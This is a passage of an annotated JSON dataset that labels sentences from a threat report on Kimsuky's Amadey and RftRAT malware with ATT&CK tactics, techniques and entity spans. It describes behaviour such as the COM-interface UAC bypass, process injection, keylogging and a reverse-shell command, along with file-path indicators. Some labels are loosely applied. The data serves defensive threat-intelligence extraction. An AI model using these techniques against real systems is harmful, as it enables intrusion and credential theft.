"context_before": "The version of Amadey used by the Kimsuky group is different from the type used by other threat actors: Kimsuky group’s Amadey uses Domain Generation Algorithms 7/20", "sentence_text": "The recently identified Amadey is ported into the AutoIt language and has the same format as the types identified in the past attack cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p8-s75-d4adfc", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 8, "sentence_id": 75, "context_before": "The recently identified Amadey is ported into the AutoIt language and has the same format as the types identified in the past attack cases.", "sentence_text": "The threat actor installed both a legitimate AutoIt executable file and a compiled AutoIt script in the infected system.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Install AutoIt executable file and compiled AutoIt script in the infected system.", "entities": [ { "text": "installed both a legitimate AutoIt executable file and a compiled AutoIt script in the infected system", "start": 17, "end": 119, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p8-s76-e160d0", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 8, "sentence_id": 76, "context_before": "The threat actor installed both...", "sentence_text": "The compiled AutoIt script is 100 MB in size for the purpose of hindering analysis and contains dummy data as shown below.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The compiled AutoIt script is designed to hinder analysis by including dummy data.", "entities": [ { "text": "compiled AutoIt script", "start": 4, "end": 26, "label": "MalwareTool" }, { "text": "hindering analysis", "start": 64, "end": 82, "label": "Action" }, { "text": "contains dummy data", "start": 87, "end": 106, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p8-s77-84acac", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 8, "sentence_id": 77, "context_before": "The compiled AutoIt script is 100 MB in size for the purpose of hindering analysis and contains dummy data as shown below.", "sentence_text": "Although written in a different language, the decrypted AutoIt script can be considered to be the Amadey malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p8-s78-8d4386", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 8, "sentence_id": 78, "context_before": "Although written in a different language...", "sentence_text": "The HTTP request structure for sending the system information collected from the infected system to the C&C server is identical to that of the typical Amadey.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": null, "procedure": "System information is sent from the infected system to the C2 server via HTTP requests.", "entities": [ { "text": "sending the system information", "start": 31, "end": 61, "label": "Action" }, { "text": "infected system", "start": 81, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "C&C server", "start": 104, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p8-s79-f6768f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 8, "sentence_id": 79, "context_before": "The HTTP request structure for sending the system information collected from the infected system to the C&C server is identical to that of the typical Amadey.", "sentence_text": "server\nBesides this, it also has a routine for checking for products from South Korean companies when retrieving the list of antivirus products installed in the infected system.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518.001", "name": "Security Software Discovery" } ], "procedure": "The malware checks installed antivirus products on the infected system.", "entities": [ { "text": "checking for products", "start": 47, "end": 68, "label": "Action" }, { "text": "antivirus products", "start": 125, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "infected system", "start": 161, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p9-s80-8acfca", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 9, "sentence_id": 80, "context_before": "server\nBesides this, it also has a routine for checking for products from South Korean companies when retrieving the list of antivirus products installed in the infected system.", "sentence_text": "As mentioned above, the Amadey used by the Kimsuky group supports DGA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p9-s81-37f2a2", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 9, "sentence_id": 81, "context_before": "As mentioned above, the Amadey used by the Kimsuky group supports DGA.", "sentence_text": "After dynamically obtaining the C&C server address based on the date, the Kimsuky group used this as a subsidiary C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1568", "name": "Dynamic Resolution" } ], "procedure": "Dynamically obtain the C&C server address based on the date and use it as a subsidiary C&C server.", "entities": [ { "text": "dynamically obtaining the C&C server address based on the date", "start": 6, "end": 68, "label": "Action" }, { "text": "used this as a subsidiary C&C server", "start": 88, "end": 124, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p9-s82-e127bc", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 9, "sentence_id": 82, "context_before": "After dynamically obtaining the C&C server address based on the date, the Kimsuky group used this as a subsidiary C&C server.", "sentence_text": "When the connection to the C&C server was down, the subsidiary C&C server generated through DGA was used for communication.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1568", "name": "Dynamic Resolution" } ], "procedure": "Use DGA-generated subsidiary C2 server for communication when primary connection is unavailable.", "entities": [ { "text": "used for communication", "start": 100, "end": 122, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p10-s84-2756c3", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 10, "sentence_id": 84, "context_before": "RFTRAT\n9/20", "sentence_text": "The AutoIt scripts used in the attacks include Amadey and RftRAT.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "AutoIt scripts including Amadey and RftRAT are used in attacks.", "entities": [ { "text": "AutoIt scripts", "start": 4, "end": 18, "label": "MalwareTool" }, { "text": "used in the attacks", "start": 19, "end": 38, "label": "Action" }, { "text": "Amadey", "start": 47, "end": 53, "label": "MalwareTool" }, { "text": "RftRAT", "start": 58, "end": 64, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p10-s85-bec70c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 10, "sentence_id": 85, "context_before": "The AutoIt scripts used in the attacks include Amadey and RftRAT.", "sentence_text": "The AutoIt executable file and the malicious AutoIt script are also created through a dropper.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Create AutoIt executable and malicious script through a dropper.", "entities": [ { "text": "created through a dropper", "start": 68, "end": 93, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p10-s86-48ed2e", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 10, "sentence_id": 86, "context_before": "The AutoIt executable file and the malicious AutoIt script are also created through a dropper.", "sentence_text": "The following ASD log shows the execution log of “d015700.dll”, which is the dropper that installs RftRAT, and the log showing RftRAT ultimately creating an Infostealer after being injected into svchost.exe.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Install RftRAT and inject it into svchost.exe to create an infostealer.", "entities": [ { "text": "installs RftRAT", "start": 90, "end": 105, "label": "Action" }, { "text": "creating an Infostealer after being injected into svchost.exe", "start": 145, "end": 206, "label": "Action" }, { "text": "RftRAT", "start": 99, "end": 105, "label": "MalwareTool" }, { "text": "svchost.exe", "start": 195, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p10-s87-b0e805", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 10, "sentence_id": 87, "context_before": "The following ASD log shows the execution log of “d015700.dll”, which is the dropper that installs RftRAT, and the log showing RftRAT ultimately creating an Infostealer after being injected into svchost.exe.", "sentence_text": "The RftRAT used in previous attacks is in DLL format and packed in VMP, so an exact comparison is difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p11-s88-653e44", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 11, "sentence_id": 88, "context_before": "The RftRAT used in previous attacks is in DLL format and packed in VMP, so an exact comparison is difficult.", "sentence_text": "The compiled AutoIt script is similar to the Amadey in the case above, but it is actually an injector that executes svchost.exe and injects RftRAT into it.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Execute svchost.exe and inject RftRAT into it.", "entities": [ { "text": "executes svchost.exe", "start": 107, "end": 127, "label": "Action" }, { "text": "injects RftRAT into it", "start": 132, "end": 154, "label": "Action" }, { "text": "svchost.exe", "start": 116, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "RftRAT", "start": 140, "end": 146, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p11-s89-a158fb", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 11, "sentence_id": 89, "context_before": "The compiled AutoIt script is similar to the Amadey in the case above, but it is actually an injector that executes svchost.exe and injects RftRAT into it.", "sentence_text": "The ultimate payload RftRAT cannot be executed independently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p11-s90-86e90a", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 11, "sentence_id": 90, "context_before": "The ultimate payload RftRAT cannot be executed independently.", "sentence_text": "Data must be read in from a mapped file named “A1CCA2EC-C09F-D33C-4317-7F71F0E2A976_0”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "The malware reads data from a mapped file for execution.", "entities": [ { "text": "read in from a mapped file", "start": 13, "end": 39, "label": "Action" }, { "text": "A1CCA2EC-C09F-D33C-4317-7F71F0E2A976_0", "start": 47, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p11-s91-628c0a", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 11, "sentence_id": 91, "context_before": "Data must be read in from a mapped file named “A1CCA2EC-C09F-D33C-4317-7F71F0E2A976_0”.", "sentence_text": "The injector AutoIt script writes the paths of the AutoIt executable file and script into this file.\n11/20", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Write paths of AutoIt executable and script into a file.", "entities": [ { "text": "writes the paths of the AutoIt executable file and script into this file", "start": 27, "end": 99, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p12-s92-65c667", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 92, "context_before": "The injector AutoIt script writes the paths of the AutoIt executable file and script into this file.\n11/20", "sentence_text": "The transmitted paths of the AutoIt executable file and script are used later on in the UAC bypassing stage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p12-s93-fc1dd0", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 93, "context_before": "The transmitted paths of the AutoIt executable file and script are used later on in the UAC bypassing stage.", "sentence_text": "RftRAT uses the ICMLuaUtil interface of the CMSTPLUACOM component to bypass UAC and execute itself as administrator.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1548.002", "name": "Abuse Elevation Control Mechanism: Bypass User Account Control" } ], "procedure": "Bypass UAC and execute itself with administrator privileges.", "entities": [ { "text": "RftRAT", "start": 0, "end": 6, "label": "MalwareTool" }, { "text": "uses the ICMLuaUtil interface of the CMSTPLUACOM component to bypass UAC", "start": 7, "end": 79, "label": "Action" }, { "text": "execute itself as administrator", "start": 84, "end": 115, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p12-s94-46c6e9", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 94, "context_before": "RftRAT uses the ICMLuaUtil interface of the CMSTPLUACOM component to bypass UAC and execute itself as administrator.", "sentence_text": "After being run as administrator, RftRAT collects basic information about the infected system and sends it to the C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Collect system information and send it to the C2 server.", "entities": [ { "text": "RftRAT", "start": 34, "end": 40, "label": "MalwareTool" }, { "text": "collects basic information about the infected system", "start": 41, "end": 93, "label": "Action" }, { "text": "sends it to the C&C server", "start": 98, "end": 124, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p12-s95-6352cc", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 95, "context_before": "After being run as administrator, RftRAT collects basic information about the infected system and sends it to the C&C server.", "sentence_text": "Offset Data\n0x0000 Signature (0x963DA7EF)\n0x0004 Infected system’s ID 0x0044 IP address 0x014 Computer name Afterward, it receives commands from the C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Receive commands from the C2 server.", "entities": [ { "text": "receives commands from the C&C server", "start": 122, "end": 159, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p12-s96-f5e36a", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 96, "context_before": "Offset Data\n0x0000 Signature (0x963DA7EF)\n0x0004 Infected system’s ID 0x0044 IP address 0x014 Computer name Afterward, it receives commands from the C&C server.", "sentence_text": "RftRAT writes the received commands to the path “%APPDATA%\\asc\\t1.pb” before decrypting them.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write received commands from C2 to a local path before decrypting them.", "entities": [ { "text": "RftRAT", "start": 0, "end": 6, "label": "MalwareTool" }, { "text": "writes the received commands to the path “%APPDATA%\\asc\\t1.pb”", "start": 7, "end": 69, "label": "Action" }, { "text": "%APPDATA%\\asc\\t1.pb", "start": 49, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p12-s97-905ef8", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 97, "context_before": "RftRAT writes the received commands to the path “%APPDATA%\\asc\\t1.pb” before decrypting them.", "sentence_text": "Decryption yields the actual commands, which are written to the same file and reread to be executed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "The malware decrypts commands and executes them.", "entities": [ { "text": "Decryption", "start": 0, "end": 10, "label": "Action" }, { "text": "written to the same file", "start": 49, "end": 73, "label": "Action" }, { "text": "executed", "start": 91, "end": 99, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p12-s98-0f7341", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 12, "sentence_id": 98, "context_before": "Decryption yields the actual commands, which are written to the same file and reread to be executed.", "sentence_text": "The command, the execution results, and the additionally downloaded file are created in the paths below.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1074", "name": "Data Staged" } ], "procedure": "Command results and downloaded files are created and stored.", "entities": [ { "text": "execution results", "start": 17, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "downloaded file", "start": 57, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "are created", "start": 73, "end": 84, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p13-s99-d58c41", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 99, "context_before": "The command, the execution results, and the additionally downloaded file are created in the paths below.\n12/20", "sentence_text": "Path Description\n%APPDATA%\\asc\\t1.pb", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p13-s100-0d19dc", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 100, "context_before": "Path Description\n%APPDATA%\\asc\\t1.pb", "sentence_text": "Command downloaded from the C&C server %APPDATA%\\asc\\t2.ax Command execution results", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p13-s101-834d06", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 101, "context_before": "Command downloaded from the C&C server %APPDATA%\\asc\\t2.ax Command execution results", "sentence_text": "%APPDATA%\\asc\\t3.br File downloaded through the download command Command Description 0x00 Download file 0x01 Upload file (zip compressed)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p13-s102-6adc83", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 102, "context_before": "%APPDATA%\\asc\\t3.br File downloaded through the download command Command Description 0x00 Download file 0x01 Upload file (zip compressed)", "sentence_text": "0x02 Look up driver information 0x04 Change file name 0x05 Create directory 0x06", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p13-s103-3322b5", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 103, "context_before": "0x02 Look up driver information 0x04 Change file name 0x05 Create directory 0x06", "sentence_text": "Delete file 0x07 Execute file (with UAC Bypass)", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1548.002", "name": "Abuse Elevation Control Mechanism: Bypass User Account Control" }, { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Delete file and execute file with UAC bypass.", "entities": [ { "text": "Delete file", "start": 0, "end": 11, "label": "Action" }, { "text": "Execute file (with UAC Bypass)", "start": 17, "end": 47, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p13-s104-670c29", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 104, "context_before": "Delete file 0x07 Execute file (with UAC Bypass)", "sentence_text": "0x08 Look up process information 0x09 Terminate process 0x0A Reverse shell 0x0B", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p13-s105-5e0406", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 105, "context_before": "0x08 Look up process information 0x09 Terminate process 0x0A Reverse shell 0x0B", "sentence_text": "Terminate process and delete file 0x12 Terminate 0x14 Wait 4.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1489", "name": "Service Stop" }, { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Terminate process and delete file.", "entities": [ { "text": "Terminate process", "start": 0, "end": 17, "label": "Action" }, { "text": "delete file", "start": 22, "end": 33, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p13-s106-28ade1", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 13, "sentence_id": 106, "context_before": "Terminate process and delete file 0x12 Terminate 0x14 Wait 4.", "sentence_text": "The group also installs Mimikatz and RDP Wrapper, which have both been steadily used for many years.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "Install Mimikatz and RDP Wrapper.", "entities": [ { "text": "installs Mimikatz and RDP Wrapper", "start": 15, "end": 48, "label": "Action" }, { "text": "Mimikatz", "start": 24, "end": 32, "label": "MalwareTool" }, { "text": "RDP Wrapper", "start": 37, "end": 48, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p14-s109-4ade91", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 14, "sentence_id": 109, "context_before": "Keylogger\n13/20", "sentence_text": "The keylogger is usually installed in the path “%ALLUSERSPROFILE%\\startup\\NsiService.exe”.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ], "procedure": "The keylogger is installed in the startup folder to achieve persistence.", "entities": [ { "text": "keylogger", "start": 4, "end": 13, "label": "MalwareTool" }, { "text": "installed", "start": 25, "end": 34, "label": "Action" }, { "text": "%ALLUSERSPROFILE%\\startup\\NsiService.exe", "start": 48, "end": 88, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p14-s110-dc33d5", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 14, "sentence_id": 110, "context_before": "The keylogger is usually installed in the path “%ALLUSERSPROFILE%\\startup\\NsiService.exe”.", "sentence_text": "It persists in the system and monitors key input from the user, which is saved in the path “%ALLUSERSPROFILE%\\semantec\\av\\C_1025.nls” or “%ALLUSERSPROFILE%\\Ahn\\av\\C_1025.nls”.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1056.001", "name": "Input Capture: Keylogging" } ], "procedure": "The keylogger persists and captures user keystrokes.", "entities": [ { "text": "persists", "start": 3, "end": 11, "label": "Action" }, { "text": "monitors key input", "start": 30, "end": 48, "label": "Action" }, { "text": "%ALLUSERSPROFILE%\\semantec\\av\\C_1025.nls", "start": 92, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p14-s111-e13996", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 14, "sentence_id": 111, "context_before": "It persists in the system and monitors key input from the user, which is saved in the path “%ALLUSERSPROFILE%\\semantec\\av\\C_1025.nls” or “%ALLUSERSPROFILE%\\Ahn\\av\\C_1025.nls”.", "sentence_text": "Infostealer\nMalware for collecting information from web browsers were created in the “%ALLUSERSPROFILE%\\semantec\\” path under the names “GBIA.exe”, “GBIC.exe”, “GBS.exe”, and “GPIA.dll”.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Infostealer malware is created to collect browser information.", "entities": [ { "text": "collecting information", "start": 24, "end": 46, "label": "Action" }, { "text": "were created", "start": 65, "end": 77, "label": "Action" }, { "text": "%ALLUSERSPROFILE%\\semantec\\", "start": 86, "end": 113, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p14-s112-fe5da6", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 14, "sentence_id": 112, "context_before": "Infostealer\nMalware for collecting information from web browsers were created in the “%ALLUSERSPROFILE%\\semantec\\” path under the names “GBIA.exe”, “GBIC.exe”, “GBS.exe”, and “GPIA.dll”.", "sentence_text": "Besides these, the tool named “GPIA.exe” looks up all paths in the infected system and displays the files in each folder.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "The tool enumerates file paths and lists files.", "entities": [ { "text": "looks up all paths", "start": 41, "end": 59, "label": "Action" }, { "text": "displays the files", "start": 87, "end": 105, "label": "Action" }, { "text": "infected system", "start": 67, "end": 82, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p14-s113-5ea1e3", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 14, "sentence_id": 113, "context_before": "Besides these, the tool named “GPIA.exe” looks up all paths in the infected system and displays the files in each folder.", "sentence_text": "Because the file containing the paths of all files is naturally large, it also allows this file to be split-compressed.\n14/20", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p15-s116-1f6fd6", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 15, "sentence_id": 116, "context_before": "Other Types", "sentence_text": "A notable fact about the Kimsuky group is that it often abuses RDP for information theft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p15-s117-459d5c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 15, "sentence_id": 117, "context_before": "A notable fact about the Kimsuky group is that it often abuses RDP for information theft.", "sentence_text": "Accordingly, it either installs RDP Wrapper or uses a patcher malware for multiple sessions.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Install RDP Wrapper or use patcher malware to enable multiple remote desktop sessions.", "entities": [ { "text": "installs RDP Wrapper", "start": 23, "end": 43, "label": "Action" }, { "text": "RDP Wrapper", "start": 32, "end": 43, "label": "MalwareTool" }, { "text": "uses a patcher malware", "start": 47, "end": 69, "label": "Action" }, { "text": "patcher malware", "start": 54, "end": 69, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p15-s118-129dc8", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 15, "sentence_id": 118, "context_before": "Accordingly, it either installs RDP Wrapper or uses a patcher malware for multiple sessions.", "sentence_text": "Recently, there was a discovery of a malware that monitors the login records of the user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p15-s119-e1689e", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 15, "sentence_id": 119, "context_before": "Recently, there was a discovery of a malware that monitors the login records of the user.", "sentence_text": "This seems to be for the purpose of finding out when the user logs in to use RDP to connect during idle times.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p15-s120-bfa212", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 15, "sentence_id": 120, "context_before": "This seems to be for the purpose of finding out when the user logs in to use RDP to connect during idle times.", "sentence_text": "The file “taskhosts.exe” installed in the path “%ALLUSERSPROFILE%\\semantec\\” is an injector that injects “ipcheck.dll” into the “explorer.exe” and “runtimebroker.exe” processes.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "The injector injects ipcheck.dll into running processes.", "entities": [ { "text": "taskhosts.exe", "start": 10, "end": 23, "label": "MalwareTool" }, { "text": "injects", "start": 97, "end": 104, "label": "Action" }, { "text": "ipcheck.dll", "start": 106, "end": 117, "label": "MalwareTool" }, { "text": "explorer.exe", "start": 129, "end": 141, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p15-s121-3fe513", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 15, "sentence_id": 121, "context_before": "The file “taskhosts.exe” installed...", "sentence_text": "“ipcheck.dll” monitors the user’s log-on/log-off activities by hooking the “WinStationQueryInformationW()” and “ExitWindowsEx()” functions and the log is saved in the path “%PUBLIC%\\Log64.txt”.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "The malware monitors activity and hooks functions.", "entities": [ { "text": "ipcheck.dll", "start": 1, "end": 12, "label": "MalwareTool" }, { "text": "monitors", "start": 14, "end": 22, "label": "Action" }, { "text": "hooking", "start": 63, "end": 70, "label": "Action" }, { "text": "%PUBLIC%\\Log64.txt", "start": 173, "end": 191, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p16-s122-93320a", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 16, "sentence_id": 122, "context_before": "“ipcheck.dll” monitors...", "sentence_text": "The threat actor also used proxy malware.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "The threat actor used proxy malware.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "used", "start": 22, "end": 26, "label": "Action" }, { "text": "proxy malware", "start": 27, "end": 40, "label": "MalwareTool" } ] }, { "uid": "aptnotes-02_aptnotes_report-p16-s123-422b34", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 16, "sentence_id": 123, "context_before": "The threat actor also used proxy malware.", "sentence_text": "Proxy tools were run by receiving command line arguments, but the type used by Kimsuky reads and uses a configuration file named “setting.ini”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The tool reads configuration for execution.", "entities": [ { "text": "reads", "start": 88, "end": 93, "label": "Action" }, { "text": "uses", "start": 98, "end": 102, "label": "Action" }, { "text": "setting.ini", "start": 131, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p16-s124-c7362f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 16, "sentence_id": 124, "context_before": "Proxy tools in the past were run by receiving command line arguments, but the type used by Kimsuky reads and uses a configuration file named “setting.ini”.", "sentence_text": "The port number 3389 configured in the default address indicates that it is likely to establish an RDP connection to a private network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, 